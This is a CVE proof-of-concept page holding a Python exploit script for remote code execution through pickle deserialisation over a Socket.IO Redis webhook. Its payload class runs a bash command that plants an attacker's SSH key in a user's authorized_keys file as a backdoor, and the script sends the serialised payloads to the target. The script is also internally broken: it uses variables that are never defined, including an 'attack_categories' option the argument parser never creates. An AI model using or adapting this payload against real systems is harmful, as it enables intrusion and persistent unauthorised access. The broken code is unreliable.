4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3

import os
import sys
import time
import pickle
import subprocess
import requests
import argparse
import socket
import threading
import zipfile
import tempfile
import json
import base64
from datetime import datetime
from urllib.parse import quote

class SSHBackdoorPayload:
    """Creates SSH backdoor by adding attacker's public key"""
    def __init__(self, ssh_public_key, username="ec2-user"):
        self.ssh_public_key = ssh_public_key
        self.username = username
    
    def __reduce__(self):
        # Multi-step command to create SSH backdoor
        cmd = [
            'bash', '-c',
            f'mkdir -p /home/{self.username}/.ssh /home/{self.username}/.ssh && '
            f'echo "{self.ssh_public_key}" >> /home/{self.username}/.ssh/authorized_keys && '
            f'chmod 700 /home/{self.username}/.ssh /home/{self.username}/.ssh && '
            f'chmod 600 /home/{self.username}/.ssh/authorized_keys /home/{self.username}/.ssh/authorized_keys 2>/dev/null && '
            f'chown -R {self.username}:{self.username} /home/{self.username}/.ssh 2>/dev/null && '
            f'echo "SSH backdoor installed for {self.username}" > /tmp/evidence/ssh_backdoor.txt'
        ]
        return (subprocess.call, (cmd,))

def test_server_connection(server_url):
    """Report whether the server's ``/health`` endpoint answers with HTTP 200.

    Sends one GET request to ``{server_url}/health`` with a 5-second timeout.
    Any exception raised while making the request is printed and treated as
    a failed check rather than propagated.

    Args:
        server_url: Base URL of the server, without a trailing ``/health``.

    Returns:
        True if the response status code is exactly 200, otherwise False.
    """
    try:
        reply = requests.get(f"{server_url}/health", timeout=5)
        is_healthy = reply.status_code == 200
    except Exception as err:
        print(f"[-] Server connection failed: {err}")
        is_healthy = False
    return is_healthy

def exploit(server_url, channel='socketio', ssh_key=None):
    print("🎯 Socket.IO Redis Pickle Exploitation (via HTTP)")
    print("=" * 50)
    print(f"Target Server: {server_url}")
    print(f"Channel: {channel}")
    print(f"Objective: RCE via pickle.loads() deserialization")
    print()

    # Filter payloads based on selected categories
    payloads = []
    for name, payload_obj, categories in all_payloads:
        if 'all' in attack_categories or any(cat in attack_categories for cat in categories):
            payloads.append((name, payload_obj))
    
    print(f"    [*] Selected {len(payloads)} payloads based on categories: {', '.join(attack_categories)}")
    
    results = []
    
    for name, payload in payloads:
        try:
            serialized = pickle.dumps(payload)
            print(f"    [+] {name}: {len(serialized)} bytes")
            results.append((name, serialized))
        except Exception as e:
            print(f"    [-] {name}: Failed to serialize - {e}")
    
    # Send exploits via HTTP POST
    print(f"[3] Sending exploits to webhook server...")
    
    total_sent = 0
    webhook_url = f"{server_url}/webhook"
    
    for name, payload_data in results:
        try:
            # Send raw pickle data as POST body
            headers = {
                'Content-Type': 'application/octet-stream',
                'X-Channel': channel,
                'X-Payload-Name': name
            }
            
            response = requests.post(
                webhook_url,
                data=payload_data,
                headers=headers,
                timeout=10
            )
            
            if response.status_code == 200:
                resp_data = response.json()
                subscribers = resp_data.get('subscribers', 0)
                print(f"    [+] {name}: HTTP 200, {subscribers} Redis subscribers")
                total_sent += 1
            else:
                print(f"    [-] {name}: HTTP {response.status_code} - {response.text[:100]}")
            
            time.sleep(0.5)  # Small delay between requests
        except Exception as e:
            print(f"    [-] {name}: Request failed - {e}")
    
    # Results
    if total_sent > 0:
        print(f"\n[+] EXPLOITATION SUCCESSFUL!")
        print(f"   {total_sent} payload(s) sent via HTTP webhook")
        
        if ssh_key:
            print(f"\n[+] SSH Backdoor installed:")
            print(f"   - Public key added to ~/.ssh/authorized_keys")
        
        return True
    else:
        print(f"\n[-] No payloads sent successfully")
        print(f"   Check that webhook server is running at {server_url}")
        print(f"   Server should accept POST requests to /webhook endpoint")
        return False

def main():
    parser = argparse.ArgumentParser(description='Socket.IO Redis Pickle Exploitation Demo (HTTP Webhook)')
    parser.add_argument('--url', default='http://localhost:6000', help='Webhook server URL (default: http://localhost:6000)')
    parser.add_argument('--channel', default='socketio', help='Socket.IO channel (default: socketio)')
    parser.add_argument('--ssh-key', default='', help='SSH public key to install as backdoor')
    parser.add_argument('--ssh-key-file', default='', help='File containing SSH public key')
    parser.add_argument('--test-only', action='store_true', help='Only test server connection')
    
    args = parser.parse_args()
    
    if not args.ssh_key and not args.ssh_key_file:
        print("[-] No SSH key provided. Please provide --ssh-key or --ssh-key-file")
        sys.exit(1)
    ssh_key = None
    if args.ssh_key:
        ssh_key = args.ssh_key
    elif args.ssh_key_file:
        try:
            with open(args.ssh_key_file, 'r') as f:
                ssh_key = f.read().strip()
            print(f"[*] Loaded SSH key from {args.ssh_key_file}")
        except Exception as e:
            print(f"[-] Failed to read SSH key file: {e}")
            sys.exit(1)
    
    if args.test_only:
        print("🔍 Testing webhook server connection...")
        success = test_server_connection(args.url)
        if success:
            print("[+] Server connection successful")
        sys.exit(0 if success else 1)
    
    success = exploit(args.url, args.channel, ssh_key)
    
    if success:
        print(f"\n[+] Exploitation completed successfully")
        print(f"[*] Categories tested: {', '.join(args.attack_categories)}")

        if ssh_key:
            print(f"   - SSH backdoor should now be accessible on target servers")
        
    else:
        print(f"\n[-] Exploitation failed")

if __name__ == '__main__':
    main()